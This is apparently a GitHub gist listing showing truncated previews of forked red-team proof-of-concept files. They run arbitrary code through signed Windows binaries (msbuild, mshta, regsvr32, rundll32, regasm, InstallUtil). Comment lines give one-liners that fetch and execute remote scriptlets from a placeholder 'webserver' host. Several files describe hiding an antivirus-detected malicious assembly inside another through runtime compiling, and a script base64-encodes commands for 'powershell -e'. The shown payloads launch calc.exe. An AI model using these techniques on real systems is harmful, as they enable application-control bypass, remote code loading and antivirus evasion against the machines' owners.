Paul PaulSec
PaulSec
/ msbuild.xml
Created
May 21, 2019 12:19
— forked from Arno0x/msbuild.xml
MSBuild project definition to execute arbitrary code from msbuild.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
PaulSec
/ calc.hta
Created
May 21, 2019 12:19
— forked from Arno0x/calc.hta
HTML Application example to be executed by mstha.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <HTA:APPLICATION ID="HelloExample"> | |
| <script language="jscript"> | |
| var c = "cmd.exe /c calc.exe"; | |
| new ActiveXObject('WScript.Shell').Run(c); | |
| </script> | |
| </head> | |
| <body> | |
| <script>self.close();</script> |
PaulSec
/ regsvr32.sct
Created
May 21, 2019 12:19
— forked from Arno0x/regsvr32.sct
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --> | |
| <!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll --> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{10001111-0000-0000-0000-0000FEEDACDC}" > | |
| <script language="JScript"> | |
| <![CDATA[ | |
PaulSec
/ scriptlet.sct
Created
May 21, 2019 12:19
— forked from Arno0x/scriptlet.sct
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
| <!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); |
PaulSec
/ regasm.cs
Created
May 21, 2019 12:19
— forked from Arno0x/regasm.cs
A DLL that can be called from regasm.exe/regsvc.exe to execute arbitrary code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ============== Compile ============ | |
| Create Your Strong Name Key -> key.snk | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' | |
| $Content = [System.Convert]::FromBase64String($key) | |
| Set-Content key.snk -Value $Content -Encoding Byte | |
| C:\Windows\Microsoft.NET\Framewor |
PaulSec
/ malicious.cs
Created
May 21, 2019 12:19
— forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| DO NOT COMPILE THIS SOURCE FILE ! | |
| Encode this source in base64: | |
| base64 -w0 malicious.cs > malicious.b64 | |
| Then paste it in the code in "not_detected.cs" source file |
PaulSec
/ poshB64Encode.sh
Created
May 21, 2019 12:20
— forked from Arno0x/poshB64Encode.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Base64 encoded, ready to be used with 'powershell -e':" | |
| echo "$1" | iconv --to-code UTF-16LE | base64 -w 0 | |
| echo |
PaulSec
/ installUtil.cs
Created
May 21, 2019 12:20
— forked from Arno0x/installUtil.cs
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs | |
| ===================================== USAGE ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll | |
| */ |
PaulSec
/ detected.cs
Created
May 21, 2019 12:21
— forked from Arno0x/detected.cs
Hiding an AV detected assembly into another one
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs | |
| */ | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; |
PaulSec
/ service.cs
Created
May 21, 2019 12:21
— forked from Arno0x/service.cs
A basic Windows service written in .Net/c#
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Creates a basic Windows Service using .Net framework. | |
| Compile: | |
| c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs | |
| Create the service with name "Service": | |
| sc create Service type=own binpath= c:\Path\To\service.exe | |
| Start the service: |